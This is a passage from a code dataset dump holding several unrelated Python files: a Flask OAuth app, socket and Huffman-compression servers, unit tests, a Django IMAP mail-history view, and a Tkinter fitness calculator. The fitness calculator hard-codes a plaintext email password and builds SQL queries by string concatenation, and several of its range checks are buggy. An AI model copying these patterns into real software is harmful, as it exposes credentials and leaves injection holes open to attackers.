logout():\n session.clear() # Added by P Conrad\n logout_user()\n return redirect(url_for('index'))\n\n\n@app.route('/authorize/')\ndef oauth_authorize(provider):\n if not current_user.is_anonymous():\n return redirect(url_for('index'))\n oauth = OAuthSignIn.get_provider(provider)\n return oauth.authorize()\n\n\n@app.route('/callback/')\ndef oauth_callback(provider):\n if not current_user.is_anonymous():\n return redirect(url_for('index'))\n oauth = OAuthSignIn.get_provider(provider)\n social_id, username, email = oauth.callback()\n if social_id is None:\n flash('Authentication failed.')\n return redirect(url_for('index'))\n user = User.query.filter_by(social_id=social_id).first()\n if not user:\n user = User(social_id=social_id, nickname=username, email=email)\n db.session.add(user)\n db.session.commit()\n login_user(user, True)\n return redirect(url_for('index'))\n\n\nif __name__ == '__main__':\n db.create_all()\n app.run(debug=True)\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"325169949","text":"import socket\n\nphone=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nphone.connect(('127.0.0.1',8080)) # 指定服务端ip和端口\n\nwhile True: \n # msg=input('>>: ').strip() #msg=''\n msg='client11111'#msg=''\n if len(msg) == 0:continue\n phone.send(msg.encode('utf-8'))\n data=phone.recv(1024)\n print(data)\n\n\nphone.close()","sub_path":"day31/基于socketserver实现并发的socket(基于tcp协议)/客户端1.py","file_name":"客户端1.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"281753990","text":"import sys\nimport os\n\ncurrent_path = os.path.dirname(os.path.realpath(__file__))\nparent_path = os.path.abspath(os.path.join(current_path, os.pardir))\nsys.path.append(parent_path)\nsys.path.append(parent_path + '/services/service_spec')\n\n# spec_path = parent_path + '/services/service_spec'\n# print(str(sys.path))\n# sys.path.remove(parent_path)\n# sys.path.remove(spec_path)\n# print(str(sys.path))\n\n\ndef clean_paths():\n sys.path.remove(parent_path)\n sys.path.remove(parent_path + '/services/service_spec')","sub_path":"sentiment-analysis/tests/path_setup.py","file_name":"path_setup.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"310042301","text":"from unittest import TestCase\n\nfrom .graph import Node, Edge, Graph\nfrom .utils import create_graph_from_geo_data, get_lines_intersection_point\n\n\nclass UtilsCase(TestCase):\n def setUp(self) -> None:\n self.data = [[0, 0], [1, 1], [2, 2], [3, 3]]\n\n def test_creating_graph_from_geo_data(self):\n g = create_graph_from_geo_data(self.data)\n self.assertEqual(len(g.nodes), 4)\n self.assertEqual(len(g.edges), 6)\n\n def test_lines_intersection_point(self):\n line1 = ((0, 1), (3, 1))\n line2 = ((1, 0), (1, 3))\n i_point = get_lines_intersection_point(line1, line2)\n self.assertSequenceEqual(i_point, (1, 1))\n\n line1 = ((1, 1), (3, 3))\n line2 = ((2, 2), (4, 4))\n res = get_lines_intersection_point(line1, line2)\n self.assertIsNone(res)\n\n\nclass NodeCase(TestCase):\n def setUp(self) -> None:\n self.node1 = Node(1, (0, 0))\n self.node2 = Node(2, (0, 1))\n\n def test_adding_nodes_return_distance(self):\n distance = self.node1 + self.node2\n self.assertEqual(distance, 1)\n\n\nclass EdgeCase(TestCase):\n def test_edges_could_be_compared(self):\n edge1 = Edge(Node(1, (0, 0)), Node(2, (0, 1)))\n edge2 = Edge(Node(1, (0, 0)), Node(2, (0, 1)))\n self.assertTrue(edge1 == edge2)\n\n edge2 = Edge(Node(1, (0, 0)), Node(2, (0, 10)))\n self.assertFalse(edge1 == edge2)\n\n\nclass GraphCase(TestCase):\n def setUp(self) -> None:\n self.node1 = Node(1, (0, 1))\n self.node2 = Node(2, (0, 2))\n self.node3 = Node(3, (0, 3))\n\n self.edge1 = Edge(self.node1, self.node2)\n self.edge2 = Edge(self.node2, self.node3)\n self.edge3 = Edge(self.node1, self.node3)\n self.g = Graph()\n\n def test_nodes_should_be_unique(self):\n self.g.add_node(self.node1)\n self.g.add_nodes([self.node1, self.node1])\n self.assertEqual(len(self.g.nodes), 1)\n\n self.g.add_node(self.node2)\n self.g.add_nodes([self.node2, self.node2])\n self.assertEqual(len(self.g.nodes), 2)\n\n def test_edge_should_not_be_added_if_graph_has_not_edge_nodes(self):\n self.g.add_node(self.node1)\n self.g.add_edge(self.edge1)\n self.assertEqual(len(self.g.edges), 0)\n\n self.g.add_node(self.node2)\n self.g.add_edge(self.edge1)\n self.assertEqual(len(self.g.edges), 1)\n\n def test_edges_should_be_unique(self):\n self.g.add_nodes([self.node1, self.node2])\n self.g.add_edge(self.edge1)\n self.g.add_edges([self.edge1, self.edge1])\n self.assertEqual(len(self.g.edges), 1)\n\n def test_edges_are_undirected(self):\n self.g.add_nodes([self.node1, self.node2])\n edge1 = Edge(self.node1, self.node2)\n edge2 = Edge(self.node2, self.node1)\n self.g.add_edges([edge1, edge2, Edge(self.node1, self.node2)])\n self.assertEqual(len(self.g.edges), 1)\n\n def test_connected_nodes(self):\n self.g.add_nodes([self.node1, self.node2, self.node3])\n self.g.add_edges([self.edge1, self.edge2, self.edge3])\n\n c_nodes = self.g.get_connected_nodes(self.node1)\n self.assertEqual(len(c_nodes), 2)\n\n c_nodes = self.g.get_connected_nodes(self.node2)\n self.assertEqual(len(c_nodes), 2)\n\n c_nodes = self.g.get_connected_nodes(self.node3)\n self.assertEqual(len(c_nodes), 2)\n\n def test_graph_to_json(self):\n self.g.add_nodes([self.node1, self.node2, self.node3])\n self.g.add_edges([self.edge1, self.edge2, self.edge3])\n\n json = self.g.json()\n self.assertEqual(len(json.keys()), 3)\n self.assertEqual(len(json[1]), 2)\n self.assertEqual(len(json[2]), 2)\n self.assertEqual(len(json[3]), 2)\n\n def test_graph_to_matrix(self):\n self.g.add_nodes([self.node1, self.node2, self.node3])\n self.g.add_edges([self.edge1, self.edge2, self.edge3])\n\n matrix = self.g.matrix.matrix\n rows, columns = matrix.shape\n self.assertEqual(rows, 3)\n self.assertEqual(columns, 3)\n self.assertSequenceEqual(\n [[0.0, 1.0, 2.0], [1.0, 0.0, 1.0], [2.0, 1.0, 0.0]], matrix.tolist()\n )\n\n def test_sum_of_graphs(self):\n g1 = Graph()\n g2 = Graph()\n g1.add_nodes([self.node1, self.node2])\n g1.add_edges([self.edge1, self.edge2])\n g2.add_nodes([self.node2, self.node3])\n g2.add_edges([self.edge2, self.edge3])\n g = g1 + g2\n\n self.assertEqual(len(g.nodes), 3)\n self.assertEqual(len(g.edges), 2)\n","sub_path":"gedit/graph/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"433677240","text":"# coding: utf-8\n\nfrom django.core.urlresolvers import reverse\nfrom django.http import Http404, HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect\nfrom django.shortcuts import render_to_response, get_object_or_404, render\nfrom django.template import RequestContext\nfrom django.utils import simplejson\nfrom django.utils.html import escape\nfrom datetime import date, datetime, timedelta\n\nfrom django.conf import settings\nfrom contacts.models import Person\nfrom email.header import decode_header\nfrom email.utils import parsedate_tz,mktime_tz\n\nimport imaplib, email, re\nfrom django.utils.translation import ugettext as _\n\n\nlist_response_pattern = re.compile(r'\\((?P.*?)\\) \"(?P.*)\" (?P.*)')\n\n\ndef parse_list_response(line):\n \"\"\" Parse '(\\\\HasNoChildren) \"/\" \"INBOX\"'\n FROM: http://www.doughellmann.com/PyMOTW/imaplib/\n \"\"\"\n flags, delimiter, mailbox_name = list_response_pattern.match(line).groups()\n mailbox_name = mailbox_name.strip('\"')\n return (flags, delimiter, mailbox_name)\n\ndef get_mail_history(email_address):\n\n mail_client = imaplib.IMAP4_SSL(settings.EMAIL_IMAP_HOST)\n mail_client.login(settings.EMAIL_HOST_USER , settings.EMAIL_HOST_PASSWORD)\n\n if mail_client.state != \"AUTH\":\n raise Exception (_('Mail login incorrect'))\n\n # cercam Inbox i All Mail\n inbox_folder = 'INBOX'\n sent_folder = ''\n allmail_folder = ''\n\n for mail_folder in mail_client.list()[1]:\n flags, delimiter, mailbox_name = parse_list_response(mail_folder)\n if mailbox_name.lower().find('sent') != -1 or flags.lower().find('sent') != -1:\n sent_folder = mailbox_name\n if flags.lower().find('all') != -1:\n allmail_folder = mailbox_name\n\n if allmail_folder != '':\n mail_client.select(allmail_folder)\n result, message_ids = mail_client.search(None, '(OR (TO \"%s\") (FROM \"%s\"))' % (email_address,email_address))\n messages = []\n\n for message_id in message_ids[0].split()[-10:]:\n result,message_string = mail_client.fetch(message_id, \"(RFC822)\")\n messages.append(email.message_from_string(message_string[0][1]))\n\n else:\n # Cercam tant a inbox com a sent\n mail_client.select(inbox_folder)\n result, message_ids_received = mail_client.search(None, '(FROM \"%s\")' % email_address)\n\n messages = []\n\n for message_id in message_ids_received[0].split()[-5:]:\n result,message_string = mail_client.fetch(message_id, \"(RFC822)\")\n messages.append(email.message_from_string(message_string[0][1]))\n\n if sent_folder != '':\n mail_client.select(sent_folder)\n result, message_ids_sent = mail_client.search(None, '(TO \"%s\")' % email_address)\n for message_id in message_ids_sent[0].split()[-5:]:\n result,message_string = mail_client.fetch(message_id, \"(RFC822)\")\n messages.append(email.message_from_string(message_string[0][1]))\n\n\n mail_client.logout()\n return messages\n\ndef get_message_body(message):\n for part in message.walk():\n if part.get_content_type() == 'text/plain':\n body = part.get_payload(decode=True).decode(part.get_content_charset())\n if len(body) > 250:\n body = body[0:250] + ' (...)'\n\n return body\n return None\n\ndef decode_message_header(header):\n result_header, encoding = decode_header(header)[0]\n try:\n return result_header.decode(encoding).replace('<','').replace('>','')\n except:\n return header.replace('<','').replace('>','')\n\ndef get_message_date(msg_date):\n date_utc = mktime_tz(parsedate_tz(msg_date))\n return datetime.fromtimestamp(date_utc).strftime('%Y-%m-%dT%H:%M:%S')\n\ndef mail_history(request, id):\n \"\"\"Fetch mail history of a contact\n\n :param id: contact id.\n \"\"\"\n results = []\n\n if not request.user.is_authenticated():\n results = {'error' : True, 'error_message' : _('User is not authenticated')}\n json = simplejson.dumps(results)\n return HttpResponse(json, mimetype='application/json')\n try:\n person = Person.objects.get(id=id)\n except Person.DoesNotExist:\n results = {'error' : True, 'error_message' : _('Person does not exist in database')}\n json = simplejson.dumps(results)\n return HttpResponse(json, mimetype='application/json')\n\n try:\n result_messages = get_mail_history(person.email_address)\n except Exception as e:\n results = {'error' : True, 'error_message' : str(e)}\n json = simplejson.dumps(results)\n return HttpResponse(json, mimetype='application/json')\n\n results = {'error' : False, 'messages' : [ {'from' : decode_message_header(message['From']), 'subject': decode_message_header(message['Subject']),'date': get_message_date(message['Date']),'body' : get_message_body(message) } for message in result_messages ]}\n json = simplejson.dumps(results)\n return HttpResponse(json, mimetype='application/json')\n","sub_path":"contacts/views/mailhistory.py","file_name":"mailhistory.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"399126765","text":"import pytest\nimport tango\nfrom ska_tango_base.commands import ResultCode\nfrom ska_tmc_common.dev_factory import DevFactory\n\nfrom tests.settings import (\n SDP_SUBARRAY_DEVICE_LOW,\n SDP_SUBARRAY_DEVICE_MID,\n SDP_SUBARRAY_LEAF_NODE_LOW,\n SDP_SUBARRAY_LEAF_NODE_MID,\n event_remover,\n logger,\n)\nfrom tests.ska_tmc_sdpsubarrayleafnode.integration.common import tear_down\n\n\ndef on_command(\n tango_context, sdpsaln_fqdn, sdpsa_fqdn, change_event_callbacks\n):\n logger.info(\"%s\", tango_context)\n dev_factory = DevFactory()\n sdp_subarray_ln_proxy = dev_factory.get_device(sdpsaln_fqdn)\n sdp_subarray_proxy = dev_factory.get_device(sdpsa_fqdn)\n try:\n sdp_subarray_ln_proxy.subscribe_event(\n \"longRunningCommandsInQueue\",\n tango.EventType.CHANGE_EVENT,\n change_event_callbacks[\"longRunningCommandsInQueue\"],\n )\n change_event_callbacks[\n \"longRunningCommandsInQueue\"\n ].assert_change_event(\n None,\n )\n result, unique_id = sdp_subarray_ln_proxy.On()\n change_event_callbacks[\n \"longRunningCommandsInQueue\"\n ].assert_change_event(\n (\"On\",),\n )\n logger.info(f\"Command ID: {unique_id} Returned result: {result}\")\n assert result[0] == ResultCode.QUEUED\n sdp_subarray_ln_proxy.subscribe_event(\n \"longRunningCommandResult\",\n tango.EventType.CHANGE_EVENT,\n change_event_callbacks[\"longRunningCommandResult\"],\n )\n change_event_callbacks[\"longRunningCommandResult\"].assert_change_event(\n (unique_id[0], str(int(ResultCode.OK))),\n lookahead=2,\n )\n\n change_event_callbacks[\n \"longRunningCommandsInQueue\"\n ].assert_change_event(\n None,\n lookahead=2,\n )\n event_remover(\n change_event_callbacks,\n [\"longRunningCommandResult\", \"longRunningCommandsInQueue\"],\n )\n tear_down(dev_factory, sdp_subarray_proxy, sdp_subarray_ln_proxy)\n except Exception as e:\n tear_down(dev_factory, sdp_subarray_proxy, sdp_subarray_ln_proxy)\n raise Exception(e)\n\n\n@pytest.mark.post_deployment\n@pytest.mark.SKA_mid\ndef test_on_command_mid(tango_context, change_event_callbacks):\n on_command(\n tango_context,\n SDP_SUBARRAY_LEAF_NODE_MID,\n SDP_SUBARRAY_DEVICE_MID,\n change_event_callbacks,\n )\n\n\n@pytest.mark.post_deployment\n@pytest.mark.SKA_low\ndef test_on_command_low(tango_context, change_event_callbacks):\n on_command(\n tango_context,\n SDP_SUBARRAY_LEAF_NODE_LOW,\n SDP_SUBARRAY_DEVICE_LOW,\n change_event_callbacks,\n )\n","sub_path":"tests/ska_tmc_sdpsubarrayleafnode/integration/test_on_command.py","file_name":"test_on_command.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"199479087","text":"from TreeNode import TreeNode\nimport heapq\nimport json\nimport socket\n\nclass Huffman:\n def __init__(self):\n self.text = None\n self.codedText = None\n self.frequencies = {}\n self.heapNodes = []\n self.coddedLetters = {}\n self.reversedCoddedLetters = {}\n self.numberZeros = 0\n\n def calculateFrequencies(self, pathToText):\n file = open(pathToText, 'r')\n self.text = file.read()\n file.close()\n for letter in self.text:\n if letter in self.frequencies:\n self.frequencies[letter] += 1\n else:\n self.frequencies[letter] = 1\n\n def buildHuffmanTree(self):\n [heapq.heappush(self.heapNodes, TreeNode(letter, self.frequencies[letter])) for letter in self.frequencies]\n\n while self.heapNodes.__len__() > 1:\n smallestNodes = [heapq.heappop(self.heapNodes) for i in range(2)]\n heapq.heappush(self.heapNodes, TreeNode(None, smallestNodes[0].frequency + smallestNodes[1].frequency,\n smallestNodes[0], smallestNodes[1]))\n\n def calculateCodedLetters(self, code, node):\n if node.letter is not None:\n self.coddedLetters[node.letter] = code\n return\n self.calculateCodedLetters(code + \"0\", node.leftNode)\n self.calculateCodedLetters(code + \"1\", node.rightNode)\n\n def getCodedText(self):\n encodedText = \"\"\n for letter in self.text:\n encodedText += self.coddedLetters[letter]\n return encodedText\n\n def compressFile(self, pathToText, pathToCode, pathToDict):\n self.calculateFrequencies(pathToText)\n self.buildHuffmanTree()\n self.calculateCodedLetters(\"\", heapq.heappop(self.heapNodes))\n file = open(pathToDict, 'w')\n file.write(json.dumps(self.coddedLetters, indent=2))\n file.close()\n self.codedText = self.getCodedText()\n self.numberZeros = 0\n for i in range(8 - self.codedText.__len__() % 8):\n self.codedText += '0'\n self.numberZeros += 1\n\n bytes = bytearray()\n for i in range(0, len(self.codedText), 8):\n byte = self.codedText[i:i + 8]\n bytes.append(int(byte, 2))\n file = open(pathToCode, 'wb')\n file.write(bytes)\n file.close()\n\n def decodeText(self, codedText):\n code = \"\"\n decodedText = \"\"\n for i in codedText:\n code += i\n if code in self.reversedCoddedLetters:\n decodedText += self.reversedCoddedLetters[code]\n code = \"\"\n return decodedText\n\n def decompressFile(self, pathToCode, pathToDecode, pathToDict):\n self.coddedLetters = json.loads(open(pathToDict).read().replace(\"}{\", \"},{\"))\n self.reversedCoddedLetters = {value: key for (key, value) in self.coddedLetters.items()}\n with open(pathToCode, 'rb') as fileInput, open(pathToDecode, 'w') as fileOutput:\n code = \"\"\n\n byte = fileInput.read(1)\n while (len(byte) > 0):\n code += bin(ord(byte))[2:].rjust(8, '0')\n byte = fileInput.read(1)\n codedText = code[:code.__len__() - self.numberZeros]\n decodedText = self.decodeText(codedText)\n file = open(pathToDecode, 'w')\n file.write(decodedText)\n file.close()\n\n\nh = Huffman()\nh.compressFile('text2.txt', 'textbin.txt', 'dict.txt')\nh.decompressFile('textbin.txt', 'decodedText.txt', 'dict.txt')\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((socket.gethostname(), 1234))\ns.listen(5)\n\nprint('Server listening....')\n\nwhile True:\n conn, addr = s.accept()\n print('Got connection from', addr)\n conn.send(bytes(str(h.numberZeros), \"utf-8\"))\n\n file = open('textbin.txt', 'rb')\n l = file.read(8)\n while (l):\n conn.send(l)\n print('Sent ',repr(l))\n l = file.read(8)\n file.close()\n\n conn.send(bytes('EOF', 'utf-8'))\n\n file = open('dict.txt','rb')\n l = file.read(8)\n while (l):\n conn.send(l)\n print('Sent ',repr(l))\n l = file.read(8)\n file.close()\n\n print('Done sending')\n conn.close()","sub_path":"huffman-server/HuffmanServer.py","file_name":"HuffmanServer.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"310135778","text":"# FRIEND OR FOE? #InspiredByCodewars\n# Make a program that filters a list of strings and returns a list with only your friends name in it.\n# If a name has exactly 4 letters in it, you can be sure that it has to be a friend of yours!\n# Otherwise, you can be sure he's not...\n# Example:\n# Input = [\"Ryan\", \"Kieran\", \"Jason\", \"Yous\"]\n# Output = {\"Ryan\":\"friend\", \"Kieran\":\"foe\", \"Jason\":\"foe\", \"Yous\":\"friend\"}\n\ninput = [\"Ryan\", \"Kieran\", \"Jason\", \"Yous\"]\nfilter = {name:\"friend\" if len(name) == 4 else \"foe\" for name in input}\nprint(filter)\n\n","sub_path":"comprehensions/dev_exercises/elijah.py","file_name":"elijah.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"99280094","text":"import datetime\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nfrom tkinter.font import Font\r\nimport sqlite3\r\nimport CenterWindow\r\nimport smtplib\r\n\r\n\r\ndef about():\r\n root = Tk()\r\n root.title('About Fitness Calculator')\r\n CenterWindow.center_window(root, 600, 400)\r\n frame1 = Frame(root, bg='gold')\r\n frame1.pack(fill=X)\r\n\r\n abt = \"\"\"The main objective of this project is to provide proper Fitness details to the students and faculty of the university.\\nThis project tells us about how fit a person is. \\nA proper way of getting details about the health of the user will keep the user updated about his \\nhealth and he will get a quick check up if he is having any disease or not.\r\n \\nThis interface will provide the user to input his details and will get a proper report of his health.\\n\r\n Our prime motive is if the patient is not well, he will come to know about his illness and get a proper \\ntreatment on time. \\nWith this a precious life can be saved.\r\n \"\"\"\r\n\r\n Label(frame1, text='Fitness Calculator', bg='gold', font=\"Verdana 20 bold\").pack()\r\n Label(frame1, text='v0.1', bg='green', fg='white', font=\"Verdana 10 bold\").pack()\r\n\r\n frame2 = Frame(root, bg='powder blue')\r\n frame2.pack(fill=BOTH, expand=1)\r\n\r\n Label(frame2, text=abt, bg='orange').pack()\r\n\r\n frame3 = Frame(root, bg='White')\r\n frame3.pack(fill=BOTH, expand=1)\r\n Label(frame3, text='Front-End Developer: Aman Deep', bg='powder blue', font=\"Verdana 10 bold\").place(x=200, y=20)\r\n Label(frame3, text='Back-End Developer: Sitesh Roy', bg='powder blue', font=\"Verdana 10 bold\").place(x=200, y=40)\r\n Label(frame3, text='Design: Basit Manzoor', bg='powder blue', font=\"Verdana 10 bold\").place(x=200, y=60)\r\n\r\n\r\ndef history():\r\n global name, email\r\n root = Tk()\r\n root.title('Enter details')\r\n CenterWindow.center_window(root, 650, 200)\r\n\r\n frame1 = Frame(root, bg='gold')\r\n frame1.pack(fill=X)\r\n\r\n Label(frame1, text='Check your History', bg='gold', font=\"Verdana 10 bold\").pack()\r\n\r\n frame2 = Frame(root, bg='powder blue')\r\n frame2.pack(fill=BOTH, expand=1)\r\n\r\n Label(frame2, text='Name', font=\"Verdana 20\", bg='powder blue').grid(row=1, column=7, padx=10, pady=10)\r\n name = Entry(frame2, width=15, font=\"Verdana 20\")\r\n name.grid(row=1, column=8, padx=10, pady=10, ipady=5)\r\n\r\n Label(frame2, text='Email', font=\"Verdana 20\", bg='powder blue').grid(row=2, column=7, padx=10, pady=10)\r\n email = Entry(frame2, width=15, font=\"Verdana 20\")\r\n email.grid(row=2, column=8, padx=10, pady=10, ipady=5)\r\n\r\n Button(frame2, text='Show Details', bg='green', fg='white', command=showdetails, font=\"Verdana 10\").grid(row=3,\r\n column=8,\r\n padx=10,\r\n pady=10)\r\n Button(frame2, text='Back', bg='red', fg='white', command=root.destroy, font=\"Verdana 10\").grid(row=3, column=1,\r\n padx=10, pady=10)\r\n\r\n\r\ndef send_mail():\r\n sender = \"siteshroy786@gmail.com\"\r\n receiver = set_email.get()\r\n password = \"SITESHROY2018\"\r\n mail_con = smtplib.SMTP(\"smtp.gmail.com\", 587)\r\n mail_con.starttls()\r\n mail_con.login(sender, password)\r\n\r\n msg = \"\"\"From: Fitness Calculator <%s>\r\n To: %s <%s>\r\n Subject: Fitness Report\r\n\r\n Name: %s\r\n Age: %s\r\n Email: %s\r\n Weight: %s\r\n Height: %s\r\n BP: %s\r\n Pulse rate: %s\r\n RBC count: %s\r\n WBC count: %s\r\n Platelets: %s\r\n HB: %s\r\n Uric acid: %s\r\n Cholestrol: %s\r\n Report Date: %s\r\n\r\n \"\"\" % (sender, full_name.get(), set_email.get(), full_name.get(), age_val.get(), set_email.get(), weight_val.get(),\r\n height_val.get(), bp_val.get(), pulse_rate_val.get(), rbc_count_val.get(), wbc_count_val.get(),\r\n platelets_val.get(), hb_val.get(), uric_acid_val.get(), cholesterol_val.get(), set_date.get())\r\n\r\n mail_con.sendmail(sender, receiver, msg)\r\n mail_con.quit()\r\n\r\n\r\ndef showdetails():\r\n cnx = sqlite3.connect('data.db')\r\n cursor = cnx.cursor()\r\n data = cursor.execute(\"SELECT * FROM report WHERE fullname='\" + name.get() + \"' and email='\" + email.get() + \"'\")\r\n\r\n root = Tk()\r\n root.title('History about ' + name.get())\r\n listbox = Listbox(root, width=60, height=20)\r\n listbox.pack()\r\n\r\n for i in data:\r\n print(i)\r\n listbox.insert(END, 'Name = ' + i[0])\r\n listbox.insert(END, 'Age = ' + i[1])\r\n listbox.insert(END, 'Email = ' + i[2])\r\n listbox.insert(END, 'Weight = ' + i[3])\r\n listbox.insert(END, 'Height = ' + i[4])\r\n listbox.insert(END, 'BP = ' + i[5])\r\n listbox.insert(END, 'Pulse rate = ' + i[6])\r\n listbox.insert(END, 'RBC count = ' + i[7])\r\n listbox.insert(END, 'WBC count = ' + i[8])\r\n listbox.insert(END, 'Platelets = ' + i[9])\r\n listbox.insert(END, 'HB = ' + i[10])\r\n listbox.insert(END, 'Uric acid = ' + i[11])\r\n listbox.insert(END, 'Cholestrol = ' + i[12])\r\n listbox.insert(END, 'Report Date = ' + i[13])\r\n listbox.insert(END, '\\n\\n**********************************************************')\r\n\r\n cnx.commit()\r\n cursor.close()\r\n cnx.close()\r\n\r\n\r\ndef call_bmi():\r\n weight_val1 = weight_val.get()\r\n height_val1 = ((height_val.get()) / 100)\r\n\r\n try:\r\n bmi_val = (weight_val1) / (height_val1 * height_val1)\r\n return str(round(bmi_val, 2))\r\n\r\n except ZeroDivisionError:\r\n bmi_val = 0\r\n return str(bmi_val)\r\n\r\n\r\ndef BMI_catg():\r\n x = call_bmi()\r\n if x in range(0, 19):\r\n return '(Underweight)'\r\n elif x in range(25, 31):\r\n return '(Overweight)'\r\n elif x in range(19, 25):\r\n return '(Healthy weight)'\r\n else:\r\n return '(Obese)'\r\n\r\n\r\ndef call_me():\r\n top = Toplevel()\r\n top.geometry(\"500x500+150+150\")\r\n top.title('Confirm')\r\n\r\n label = Label(top, text=\"RBC Count\").place(x=40, y=50)\r\n\r\n label_a = Label(top, text=str(fetch7.get())).place(x=90, y=50)\r\n label_b = Label(top, text=str(RCB_Cal())).place(x=120, y=50)\r\n\r\n\r\ndef BP_Cal():\r\n a1 = bp_val.get()\r\n if a1 in range(40, 90):\r\n return '(Low)'\r\n elif a1 in range(90, 120):\r\n return '(Normal)'\r\n elif a1 in range(120, 140):\r\n return '(Prehypertension)'\r\n elif a1 in range(140, 160):\r\n return '(High: stage 1 hypertension)'\r\n elif a1 in range(180, 300):\r\n return '(High: stage 2 hypertension)'\r\n else:\r\n return '(Dead)'\r\n\r\n\r\ndef Pulserate_Cal():\r\n b1 = pulse_rate_val.get()\r\n if b1 in range(60, 100):\r\n return '(Low)'\r\n elif b1 in range(0, 60):\r\n return '(Normal)'\r\n elif b1 in range(100, 200):\r\n return '(High)'\r\n else:\r\n return '(Dead)'\r\n\r\n\r\ndef RCB_Cal():\r\n c1 = rbc_count_val.get()\r\n if c1 in range(4, 6):\r\n return '(Normal)'\r\n elif c1 in range(0, 4):\r\n return '(Low)'\r\n elif c1 in range(6, 12):\r\n return '(High)'\r\n else:\r\n return '(Not defined)'\r\n\r\n\r\ndef WBC_cal():\r\n d1 = wbc_count_val.get()\r\n if d1 in range(4500, 11000):\r\n return '(Normal)'\r\n elif d1 in range(0, 4500):\r\n return '(Low)'\r\n elif d1 in range(11000, 20000):\r\n return '(High)'\r\n else:\r\n return '(Not defined)'\r\n\r\n\r\ndef Platelets_cal():\r\n e1 = platelets_val.get()\r\n if e1 in range(150000, 450000):\r\n return '(Normal)'\r\n elif e1 in range(0, 150000):\r\n return '(Thrombocytopenia)'\r\n elif e1 in range(450000, 750000):\r\n return '(Thrombocytosis)'\r\n else:\r\n return '(Not defined)'\r\n\r\n\r\ndef hb_Cal():\r\n f1 = hb_val.get()\r\n if f1 in range(14, 18):\r\n return '(Normal)'\r\n elif f1 in range(0, 14):\r\n return '(Low)'\r\n elif f1 in range(18, 50):\r\n return '(High)'\r\n else:\r\n return '(Not defined)'\r\n\r\n\r\ndef Uricacid_Cal():\r\n g1 = uric_acid_val.get()\r\n if g1 in range(3, 6):\r\n return '(Normal)'\r\n elif g1 in range(0, 3):\r\n return '(Asymptomatic hyperuricemia)'\r\n elif g1 in range(6, 9):\r\n return '(Hyperuricemia)'\r\n else:\r\n return '(Not defined)'\r\n\r\n\r\ndef cholesterol_Cal():\r\n h1 = cholesterol_val.get()\r\n if h1 in range(100, 200):\r\n return '(Normal)'\r\n elif h1 in range(200, 239):\r\n return '(Borderline high)'\r\n elif h1 in range(239, 400):\r\n return '(High)'\r\n elif h1 in range(0, 100):\r\n return '(Low)'\r\n else:\r\n return '(Not defined)'\r\n\r\n\r\ndef Submission_successful():\r\n if check_validation() == True:\r\n save_database()\r\n messagebox.showinfo(\"Success\", \"Your submission is successful!\")\r\n # send_mail()\r\n # messagebox.showinfo(\"Email\", \"Your Report has been mailed!\")\r\n toplevel() # Calling the function topLevel()\r\n else:\r\n messagebox.showwarning(\"Inputs missing\", \"Kindly fill up all the details!\")\r\n\r\n\r\ndef not_saved():\r\n response = messagebox.askquestion(\"Alert\", \"Your data will not be saved, still want to exit?\")\r\n if response == 'yes':\r\n root.destroy()\r\n\r\n\r\ndef int_validate(inp):\r\n if inp.isdigit():\r\n return True\r\n elif inp is \"\":\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef toplevel():\r\n top = Toplevel()\r\n top.title(\"Final Report\")\r\n CenterWindow.center_window(top, 650, 600)\r\n top.resizable(0, 0)\r\n\r\n label_top0 = Label(top, text=\"Fitness Report\", width=20, font=('bold', 20))\r\n label_top0.place(x=170, y=120)\r\n label_top0.pack()\r\n\r\n canvas1 = Canvas(top)\r\n canvas1.pack()\r\n line1 = canvas1.create_line(10, 3, 400, 3, fill=\"green\")\r\n\r\n label_top0 = Label(top, text=\"Date : \", width=20, font=myFont3)\r\n label_top0.place(x=460, y=70)\r\n\r\n label_top0a = Label(top, text=set_date.get(), font=myFont5).place(x=500, y=90)\r\n\r\n label_top1 = Label(top, text=\"1. Full Name : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top1.place(x=80, y=130)\r\n\r\n label_top1a = Label(top, text=full_name.get()).place(x=210, y=130)\r\n\r\n label_top2 = Label(top, text=\"2. Age : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top2.place(x=340, y=130)\r\n\r\n label_top2a = Label(top, text=str(age_val.get()) + ' yrs').place(x=470, y=130)\r\n\r\n label_top3 = Label(top, text=\"3. Weight : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top3.place(x=80, y=160)\r\n\r\n label_top3a = Label(top, text=str(weight_val.get()) + ' kg').place(x=210, y=160)\r\n\r\n label_top4 = Label(top, text=\"4. Height : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top4.place(x=340, y=160)\r\n\r\n label_top4a = Label(top, text=str(weight_val.get()) + ' cm').place(x=470, y=160)\r\n\r\n label_top5 = Label(top, text=\"5. BMI : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top5.place(x=80, y=190)\r\n\r\n label_top5a = Label(top, text=call_bmi()).place(x=210, y=190)\r\n label_top5b = Label(top, text=str(BMI_catg())).place(x=240, 